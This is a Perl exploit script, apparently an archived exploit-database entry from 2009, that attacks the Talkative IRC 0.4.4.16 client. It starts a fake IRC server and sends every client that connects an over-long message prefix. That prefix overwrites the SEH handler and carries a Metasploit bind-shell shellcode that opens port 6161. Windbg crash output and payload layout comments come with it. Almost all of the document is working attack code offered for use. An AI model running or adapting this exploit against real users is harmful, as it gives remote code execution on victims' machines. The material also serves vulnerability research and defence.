# Title : Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
# Published : 2009-03-17
# Author : LiquidWorm
#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack-based buffer overflow when it parses an over-long
# message prefix sent by the server it is connected to. The ECX and EIP registers and the SEH record are
# overwritten with attacker-controlled bytes (see the windbg output below), so a malicious server can
# redirect execution and run arbitrary code in the context of the client user.
#
# Tested on Microsoft Windows XP Professional SP2 (English). The pop/pop/ret address used below is taken
# from that build's kernel32.dll; other Windows versions, service packs or language editions ship a
# different kernel32.dll, so the address will generally have to be re-located before use.
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 42424242 ?? ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#
use strict;
use warnings;
use IO::Socket;
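# Bind the fake IRC server, accept ONE client, send it a welcome numeric and
# then the overflow line, and return. The listener and the accepted connection
# are closed when the lexicals go out of scope, so the caller can loop.
#
# Argument: optional bind address (default 'localhost'). The default only
# reaches a client running on the same machine; pass an interface address to
# serve a remote victim. Whatever connects to the port receives the payload --
# there is no check that the peer really is Talkative IRC.
#
# Dies if the port cannot be bound or accept() fails; warns if a write to the
# client fails. Nothing useful is returned.
sub start_zerver {
    my ($bind_addr) = @_;
    $bind_addr = 'localhost' unless defined $bind_addr;

    my $listener = IO::Socket::INET->new(
        Listen    => 1,
        LocalAddr => $bind_addr,
        LocalPort => 6667,
        Proto     => 'tcp',
        ReuseAddr => 1,    # port is re-bound on every call; avoid EADDRINUSE from TIME_WAIT
    ) or die "cannot listen on $bind_addr:6667: $@\n";

    header();
    print "\n [*] Evil IRC Server started on port 6667\n";

    my $client = $listener->accept()
        or die "accept() failed: $!\n";

    # --- payload layout, in the order it is sent after the leading ':' ---
    my $padding   = "A" x 272;                # fills the buffer up to the SEH record
    my $next_seh  = "\xeb\x06\x90\x90";       # nSEH: short jmp +6, over the handler slot
    my $seh       = "\x9a\x72\x85\x7c";       # handler: 0x7C85729A pop/pop/ret in kernel32.dll
                                              # (Windows XP SP2 English; re-locate for other builds)
    my $nop_start = "\x90" x 25;              # landing pad for the jmp
    my $nop_end   = "\x90" x 10;

    # win32_bind - EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
    # The bind port 6161 is baked into these bytes; a different port means
    # regenerating the shellcode, not editing the number in the banner.
    my $shellcode =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
        "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
        "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
        "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
        "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" .
        "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58" .
        "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x33\x4b\x58\x4e\x37" .
        "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58" .
        "\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48" .
        "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" .
        "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .
        "\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x42\x45\x37\x45\x4e\x4b\x58" .
        "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54" .
        "\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48" .
        "\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d" .
        "\x46\x36\x4b\x38\x43\x54\x42\x43\x4b\x38\x42\x54\x4e\x30\x4b\x58" .
        "\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x56" .
        "\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
        "\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x47" .
        "\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" .
        "\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" .
        "\x48\x46\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x56\x44\x50" .
        "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" .
        "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x45\x43\x45\x43\x34" .
        "\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x4a\x51" .
        "\x41\x51\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" .
        "\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31" .
        "\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42" .
        "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" .
        "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x35\x4f\x4f\x48\x4d" .
        "\x42\x55\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
        "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x35" .
        "\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x56\x48\x46\x4a\x36\x43\x36" .
        "\x4d\x56\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x45\x49\x42\x4e\x4c" .
        "\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c" .
        "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x52" .
        "\x43\x59\x4d\x48\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" .
        "\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f" .
        "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x56" .
        "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x46" .
        "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56" .
        "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .
        "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .
        "\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x45\x4f\x4f\x48\x4d" .
        "\x4f\x4f\x42\x4d\x5a";

    print " [*] Throwing payload...\r\n";

    # A 001 welcome goes first; presumably so the client treats the connection
    # as registered before the malformed line arrives (not verified here).
    print {$client} ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n"
        or warn "write to client failed: $!\n";
    sleep(1);    # give the client time to process the welcome before the overflow line

    # Over-long message prefix: ':' followed by the overflow buffer, then a
    # plausible-looking command so the line is parsed like a normal message.
    my $evil_line = ":" . $padding . $next_seh . $seh . $nop_start . $shellcode . $nop_end
                  . " PRIVMSG t00t : /FINGER w00t.\r\n";
    print {$client} $evil_line
        or warn "write to client failed: $!\n";

    return;
}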
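# Main loop: serve one victim per iteration and go back to listening for the
# next one. There is no exit condition; stop the script with Ctrl-C.
# start_zerver() dies if the port cannot be bound, which also ends the loop.
# NOTE(review): the two messages below are printed right after the payload has
# been written, not after any confirmation -- the script gets no feedback from
# the client, so whether the overflow and the bind shell actually worked has
# to be checked by connecting to TCP port 6161 on the victim.
while (1) {
    start_zerver();
    print " [*] Talkative IRC client successfully exploited!\r\n\n";
    print " [**] Check shell on port 6161! [**]\r\n";
}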
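# Print the banner to STDOUT. Called once per start_zerver() run; returns true
# and callers ignore the value.
sub header {
    my $rule = "~" x 80;
    print "\n", $rule, "\n";
    print " Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\n";
    print " by LiquidWorm (c) 2009\n\n";
    print $rule, "\n\n";
    return 1;
}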